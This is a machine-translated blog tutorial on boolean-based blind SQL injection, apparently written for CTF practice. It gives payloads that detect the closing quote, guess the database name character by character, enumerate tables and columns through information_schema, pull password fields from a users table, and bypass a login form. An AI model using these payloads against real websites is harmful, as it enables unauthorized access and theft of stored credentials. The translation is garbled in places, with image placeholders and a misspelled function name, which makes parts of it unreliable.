SQL injection-blind injection

The principle of blinds

Preface

Blind injection is a type of sql injection, mainly used for injection without a display position. The page does not report an error like a robot, which means yes, and no display means no. We can judge the database name, table name, and column based on yes and no. Ming and fields.

The first step is to determine the closing character

We entered 1'and found an empty page
Insert picture description here
we 1'add back --+, find the page back to normal
Insert picture description here

Guess the library name

After we know the closing symbol, we can inject some SQL statements to guess the library name.
By first 1' and (lenth(database())>1)--+determines the length of the name of the library may be modified following values 1.
Insert picture description here
After some attempts, the length is 8 and
guess the library name through the ascii code:

1' and (ascii(substr(database(),{
    
    1},1))>{
    
    97})--+(中括号不带入代码)

By changing the value of 1 in the first square bracket to determine the English letters of the library name in order,
by changing the value of 97 in the following square brackets and using the dichotomy to determine the value of the ASCII code of the letter at the position, so as to get the value of the position English letters, and finally the name of the database.

Guess the data table name

1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {
    
    0},1),{
    
    1},1)))>{
    
    101} --+(中括号不带入代码)

The method is basically the same as that of guessing the library name, and the judgment is made by modifying the content in the brackets.
It is worth noting that there are many data tables by modifying the 0 in the brackets in the limit to determine other table names, so as to find the table name we need to find.

Guess the column name

1' and (ascii(substr((select column_name from information_schema.columns where table_name='{
    
    users}' limit {
    
    0},1),{
    
    1},1)))>{
    
    100} --+(中括号不带入代码)

There is one more variable in the brackets in the code, which is the table name. Users can be changed to the database we want to query. The usage of the variables in other brackets is the same as above.

Burst field

1' and (ascii(substr(( select {password} from {users} limit {
    
    0},1),{
    
    1},1)))>{
    
    1}--+ 

Maybe some new friends have discovered it a long time ago. The hand-notes are really one question a year, and I can’t see it anymore. I am not pitted by you, but I am really pitted by various tools. Let’s write about the detailed usage of these tools. Besides, the blogs of other big guys have usages. I’m a rookie. Let’s explore the tools slowly. There is also the script. After I write it, I will give you more script benefits. This article It's just the simplest basis for blind injection. When you encounter most of the questions, remember to act accordingly. First find a way to answer your yes or no on the webpage, and then inject the sentence,
such as giving a login box and you are prompted to flag after entering the database through the universal password. In, this is normal, we can do the sal blind injection as yes or no if the login is successful. For
example, 1" or (lenth(database())>1)--+just follow the blind sentence directly after the or, remember to act accordingly.
Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_46148324/article/details/104739749